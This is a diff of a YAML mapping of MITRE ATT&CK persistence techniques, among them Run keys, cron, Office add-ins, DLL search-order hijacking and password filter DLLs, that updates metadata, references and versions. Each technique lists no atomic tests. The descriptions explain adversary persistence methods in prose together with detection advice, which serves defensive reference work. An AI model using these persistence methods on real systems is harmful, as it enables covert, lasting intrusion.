         Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -27918,9 +28298,9 @@ persistence:
           2017.
         url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Microsoft TimeProvider
         description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
         url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -27936,12 +28316,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547
     atomic_tests: []
   T1547.014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T14:17:17.353Z'
       name: Active Setup
       description: |-
         Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -28016,7 +28395,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.014
     atomic_tests: []
   T1542.005:
@@ -28059,7 +28437,7 @@ persistence:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
           Information. Retrieved October 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T16:35:53.806Z'
       name: TFTP Boot
       description: |-
         Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -28083,8 +28461,6 @@ persistence:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1543.003:
     technique:
@@ -28239,31 +28615,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.003
     atomic_tests: []
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -28280,6 +28636,7 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -28290,9 +28647,13 @@ persistence:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -28300,17 +28661,37 @@ persistence:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests: []
   T1137:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:01:21.255Z'
+      name: Office Application Startup
+      description: |-
+        Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
+
+        A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
       x_mitre_contributors:
       - Nick Carr, Mandiant
       - Microsoft Threat Intelligence Center (MSTIC)
@@ -28318,79 +28699,73 @@ persistence:
       - Praetorian
       - Loic Jaquemet
       - Ricardo Dias
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
+
+        Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
+
+        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.4'
+      x_mitre_data_sources:
+      - 'File: File Creation'
+      - 'Application Log: Application Log Content'
+      - 'Windows Registry: Windows Registry Key Modification'
+      - 'File: File Modification'
+      - 'Module: Module Load'
+      - 'Process: Process Creation'
+      - 'Windows Registry: Windows Registry Key Creation'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
       created: '2017-12-14T16:46:06.044Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1137
         url: https://attack.mitre.org/techniques/T1137
-      - source_name: SensePost Ruler GitHub
-        url: https://github.com/sensepost/ruler
-        description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
-          services. Retrieved February 4, 2019.'
+        external_id: T1137
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
       - source_name: TechNet O365 Outlook Rules
-        url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
         description: Koeller, B.. (2018, February 21). Defending Against Rules and
           Forms Injection. Retrieved November 5, 2019.
+        url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
       - source_name: CrowdStrike Outlook Forms
-        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
         description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
           Movement and Persistence. Retrieved February 5, 2019.
-      - source_name: Outlook Today Home Page
-        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
-        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
-          Retrieved February 5, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
+        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+      - source_name: SensePost Ruler GitHub
+        description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
+          services. Retrieved February 4, 2019.'
+        url: https://github.com/sensepost/ruler
       - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
         description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
           provides blue teams with the ability to detect Ruler usage against Exchange.
           Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Office Application Startup
-      description: |-
-        Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
-
-        A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      x_mitre_detection: |-
-        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
-
-        Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
-
-        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-      x_mitre_version: '1.3'
+        url: https://github.com/sensepost/notruler
+      - source_name: Outlook Today Home Page
+        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+          Retrieved February 5, 2019.
+        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'File: File Creation'
-      - 'Application Log: Application Log Content'
-      - 'Windows Registry: Windows Registry Key Modification'
-      - 'File: File Modification'
-      - 'Module: Module Load'
-      - 'Process: Process Creation'
-      - 'Windows Registry: Windows Registry Key Creation'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1137
     atomic_tests: []
   T1098.003:
     technique:
-      modified: '2024-03-29T18:29:06.873Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Roles'
       description: "An adversary may add additional roles or permissions to an adversary-controlled
         cloud account to maintain persistent access to a tenant. For example, adversaries
@@ -28420,6 +28795,7 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Alex Parsons, Crowdstrike
@@ -28430,6 +28806,7 @@ persistence:
       - Praetorian
       - Alex Soler, AttackIQ
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
         accounts to identify unusual activity in the assignment of roles to those
@@ -28438,13 +28815,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -28486,9 +28863,6 @@ persistence:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.003
     atomic_tests: []
   T1547.012:
@@ -28556,19 +28930,18 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.012
     atomic_tests: []
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -28584,8 +28957,8 @@ persistence:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -28599,7 +28972,7 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -28625,6 +28998,10 @@ persistence:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -28652,42 +29029,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests: []
   T1137.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
-      type: attack-pattern
-      created: '2019-11-07T19:52:52.801Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.006
-        url: https://attack.mitre.org/techniques/T1137/006
-      - url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
-        description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
-        source_name: Microsoft Office Add-ins
-      - url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
-        description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
-          Persistence. Retrieved July 3, 2017.
-        source_name: MRWLabs Office Persistence Add-ins
-      - source_name: FireEye Mail CDS 2018
-        url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
-        description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
-          Enterprise Email Compromise. Retrieved April 22, 2019.
-      - source_name: GlobalDotName Jun 2019
-        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
-        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
-          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:37:09.190Z'
       name: 'Office Application Startup: Add-ins'
       description: "Adversaries may abuse Microsoft Office add-ins to obtain persistence
         on a compromised system. Office add-ins can be used to add functionality to
@@ -28702,13 +29048,18 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Modification'
@@ -28716,11 +29067,34 @@ persistence:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
+      created: '2019-11-07T19:52:52.801Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/006
+        external_id: T1137.006
+      - source_name: FireEye Mail CDS 2018
+        description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
+          Enterprise Email Compromise. Retrieved April 22, 2019.
+        url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
+      - source_name: MRWLabs Office Persistence Add-ins
+        description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
+          Persistence. Retrieved July 3, 2017.
+        url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
+      - source_name: Microsoft Office Add-ins
+        description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
+        url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
+      - source_name: GlobalDotName Jun 2019
+        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.006
     atomic_tests: []
   T1505.002:
@@ -28751,7 +29125,7 @@ persistence:
         url: https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf
         description: 'Faou, M. (2019, May). Turla LightNeuron: One email away from
           remote code execution. Retrieved June 24, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T17:05:44.321Z'
       name: 'Server Software Component: Transport Agent'
       description: "Adversaries may abuse Microsoft transport agents to establish
         persistent access to systems. Microsoft Exchange transport agents can operate
@@ -28789,13 +29163,11 @@ persistence:
       - SYSTEM
       - Administrator
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1505.002
     atomic_tests: []
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -28821,7 +29193,7 @@ persistence:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -28863,7 +29235,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1098.006:
     technique:
@@ -28941,11 +29312,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -29025,35 +29395,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -29077,71 +29422,60 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
